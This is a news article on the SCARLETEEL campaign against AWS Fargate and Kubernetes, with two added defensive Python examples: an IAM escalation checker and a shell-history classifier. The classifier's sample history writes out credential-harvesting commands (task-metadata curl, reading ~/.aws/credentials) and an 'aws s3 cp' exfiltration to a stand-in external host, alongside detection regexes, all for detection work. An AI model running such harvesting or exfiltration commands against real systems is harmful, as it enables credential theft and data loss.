Cloud environments continue to be at the receiving end of an ongoing advanced attack campaign dubbed SCARLETEEL, with the threat actors now setting their sights on Amazon Web Services (AWS) Fargate.
“Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture,” Sysdig security researcher Alessandro Brucato said in a new report shared with The Hacker News.
SCARLETEEL was first exposed by the cybersecurity company in February 2023, detailing a sophisticated attack chain that culminated in the theft of proprietary data from AWS infrastructure and the deployment of cryptocurrency miners to profit off the compromised systems’ resources illegally.
A follow-up analysis by Cado Security uncovered potential links to a prolific cryptojacking group known as TeamTNT, although Sysdig told The Hacker News that it “could be someone copying their methodology and attack patterns.”
The latest activity continues the threat actor's penchant for going after AWS accounts by exploiting vulnerable public-facing web applications, with the ultimate aim of gaining persistence, stealing intellectual property, and generating revenue with crypto miners, potentially racking up cloud bills of as much as $4,000 per day.
“The actor discovered and exploited a mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted,” Brucato explained.
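The report does not reproduce the policy mistake itself, so what follows is an added illustration, not the policy from the incident and not Sysdig's or the attacker's tooling: a small checker that walks an IAM policy document and reports which self-escalation IAM actions it effectively allows, including the NotAction and wildcard cases that most often turn a "developer" policy into a path to AdministratorAccess. The three policy documents, the action list and every function name here are constructed for this example.

```python
import fnmatch

# IAM actions that let a principal grant itself more permissions. A policy that
# allows any of these broadly is the kind of mistake that ends in AdministratorAccess.
# (Constructed list for this example; not exhaustive.)
ESCALATION_ACTIONS = (
    "iam:AttachUserPolicy", "iam:AttachRolePolicy", "iam:AttachGroupPolicy",
    "iam:PutUserPolicy", "iam:PutRolePolicy", "iam:PutGroupPolicy",
    "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "iam:CreateAccessKey", "iam:CreateLoginProfile", "iam:UpdateLoginProfile",
    "iam:UpdateAssumeRolePolicy", "iam:AddUserToGroup",
)


def _as_list(value):
    if value is None:
        return []
    return list(value) if isinstance(value, list) else [value]


def _action_matches(patterns, action):
    # IAM action names are case-insensitive and accept '*' and '?' wildcards.
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)


def _statement_covers(stmt, action):
    """Does this statement's Action/NotAction clause apply to `action`?"""
    if "NotAction" in stmt:
        # NotAction grants everything *except* the listed actions: a common footgun.
        return not _action_matches(_as_list(stmt["NotAction"]), action)
    return _action_matches(_as_list(stmt.get("Action")), action)


def escalation_paths(policy, candidates=ESCALATION_ACTIONS):
    """Return {action: [resources]} for every candidate action the policy allows.

    An action counts as allowed when some Allow statement covers it and no Deny
    statement covers it on Resource "*". Conditions are ignored on purpose (a
    conditioned Allow still deserves a human look); NotResource is treated as "*".
    """
    found = {}
    for action in candidates:
        allowed_on, denied_everywhere = [], False
        for stmt in _as_list(policy.get("Statement")):
            if not _statement_covers(stmt, action):
                continue
            resources = _as_list(stmt.get("Resource", "*"))
            if stmt.get("Effect") == "Allow":
                allowed_on.extend(resources)
            elif stmt.get("Effect") == "Deny" and "*" in resources:
                denied_everywhere = True
        if allowed_on and not denied_everywhere:
            found[action] = sorted(set(allowed_on))
    return found


# Constructed "developer" policy with two mistakes: an explicit iam:PutUserPolicy
# grant, and a wildcard meant for reading policy versions that also matches the
# write actions CreatePolicyVersion and SetDefaultPolicyVersion.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "iam:Get*", "iam:List*"], "Resource": "*"},
        {"Effect": "Allow", "Action": ["iam:PutUserPolicy", "iam:*PolicyVersion"], "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:CreateAccessKey", "Resource": "*"},
    ],
}

# Constructed NotAction policy: "everything except one S3 call" includes all of IAM.
NOTACTION_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "NotAction": "s3:DeleteBucket", "Resource": "*"}],
}

# Hardened version: read-only IAM, plus an explicit Deny guardrail on IAM writes.
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "iam:Get*", "iam:List*"], "Resource": "*"},
        {"Effect": "Deny", "Action": ["iam:Put*", "iam:Attach*", "iam:Create*",
                                     "iam:Set*", "iam:Update*", "iam:Add*"], "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for name, pol in [("weak", WEAK_POLICY), ("notaction", NOTACTION_POLICY), ("hardened", HARDENED_POLICY)]:
        print(name, escalation_paths(pol))
```

Run it against a policy pulled with `aws iam get-policy-version`; anything it reports on Resource "*" for a principal that is not meant to administer IAM is the kind of gap the report describes. The checker is deliberately conservative (it ignores Condition blocks), so treat its output as a review queue rather than a verdict.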
It all begins with the adversary exploiting JupyterLab Notebook containers deployed in a Kubernetes cluster, leveraging the initial foothold to conduct reconnaissance of the target network and gather AWS credentials to obtain deeper access into the victim’s environment.
This is followed by the installation of the AWS command-line tool and Pacu, an AWS exploitation framework, for post-exploitation. The attack also stands out for its use of various shell scripts to retrieve AWS credentials, some of which target workloads running on the AWS Fargate compute engine.
“The attacker was observed using the AWS client to connect to Russian systems which are compatible with the S3 protocol,” Brucato said, adding the SCARLETEEL actors used stealthy techniques to ensure that data exfiltration events are not captured in CloudTrail logs.
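The page does not reproduce the credential-harvesting scripts or the exfiltration commands, so the following is an added example, written for this page and not Sysdig's code or the attacker's: a small classifier over shell command lines that tags the credential sources such scripts reach for (the task metadata endpoint that hands ECS and Fargate tasks their role credentials, the EC2 IMDS path, credential files and environment variables) and flags AWS CLI calls whose --endpoint-url points outside AWS. The caveat behind the CloudTrail point is simple: a request sent to a third-party S3-compatible endpoint never reaches AWS, so CloudTrail has nothing to record; the only places to see it are on the host (process or shell-history auditing) and at the network egress. The sample history lines, the host names in them and the tag names are all constructed for this example.

```python
import os
import re
import shlex
from urllib.parse import urlparse

# Indicators of credential harvesting, keyed by a constructed tag name.
CREDENTIAL_PATTERNS = {
    # ECS and Fargate tasks fetch their task-role credentials from the task
    # metadata endpoint at 169.254.170.2 using a path from this env var.
    "ecs_task_credentials": re.compile(
        r"169\.254\.170\.2|AWS_CONTAINER_CREDENTIALS_(RELATIVE|FULL)_URI"),
    # EC2 instance-role credentials via IMDS.
    "ec2_imds_credentials": re.compile(
        r"169\.254\.169\.254/latest/meta-data/iam/security-credentials"),
    # Static credentials on disk or in the environment.
    "aws_credential_files": re.compile(r"\.aws/credentials|\.aws/config"),
    "aws_env_secrets": re.compile(
        r"AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN|(env|printenv)\b.*AWS_"),
}

# Hosts under these suffixes are AWS; anything else given to --endpoint-url is
# an S3-compatible third party (or a private gateway you should allow-list).
AWS_HOST_SUFFIXES = (".amazonaws.com", ".amazonaws.com.cn")


def _endpoint_host(argv):
    """Return the host given to --endpoint-url, in either CLI spelling, else None."""
    for i, tok in enumerate(argv):
        if tok == "--endpoint-url" and i + 1 < len(argv):
            return urlparse(argv[i + 1]).hostname
        if tok.startswith("--endpoint-url="):
            return urlparse(tok.split("=", 1)[1]).hostname
    return None


def classify_command(cmd):
    """Return the set of indicator tags that apply to one shell command line."""
    tags = {name for name, rx in CREDENTIAL_PATTERNS.items() if rx.search(cmd)}
    try:
        argv = shlex.split(cmd)
    except ValueError:          # unbalanced quotes in a history line
        argv = cmd.split()
    if argv and os.path.basename(argv[0]) == "aws":
        host = _endpoint_host(argv)
        if host and not host.endswith(AWS_HOST_SUFFIXES):
            tags.add("non_aws_s3_endpoint")
    return tags


def scan_history(lines):
    """Return [(command, sorted tags)] for every line that carries an indicator."""
    hits = []
    for line in lines:
        tags = classify_command(line)
        if tags:
            hits.append((line, sorted(tags)))
    return hits


# Constructed shell history; the bucket and endpoint host are made up for this example.
SAMPLE_HISTORY = [
    'curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"',
    "cat ~/.aws/credentials",
    "env | grep AWS_",
    "aws s3 ls",
    "aws s3 cp /data/export.tar.gz s3://loot/export.tar.gz --endpoint-url https://storage.example.net",
    "aws s3 cp file.txt s3://mybucket/ --endpoint-url https://s3.eu-west-1.amazonaws.com",
    "ls -la /tmp",
]

if __name__ == "__main__":
    for line, tags in scan_history(SAMPLE_HISTORY):
        print(tags, "<-", line)
```

Feed it process command lines from your runtime sensor or the shell history of a compromised container rather than real history files from a developer laptop, where `cat ~/.aws/credentials` is routine. The endpoint check is the part that matters for the CloudTrail caveat: the `storage.example.net` line is invisible to CloudTrail by construction, while the `s3.eu-west-1.amazonaws.com` line would appear there only if S3 data events are enabled for the bucket.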
Some of the other steps taken by the attacker include the use of Peirates, a Kubernetes penetration testing tool, to attack the container orchestration system, and the deployment of Pandora, a DDoS botnet malware, indicating further attempts on the part of the actor to monetize the infected hosts.
“The SCARLETEEL actors continue to operate against targets in the cloud, including AWS and Kubernetes,” Brucato said. “Their preferred method of entry is exploitation of open compute services and vulnerable applications. There is a continued focus on monetary gain via crypto mining, but […] intellectual property is still a priority.”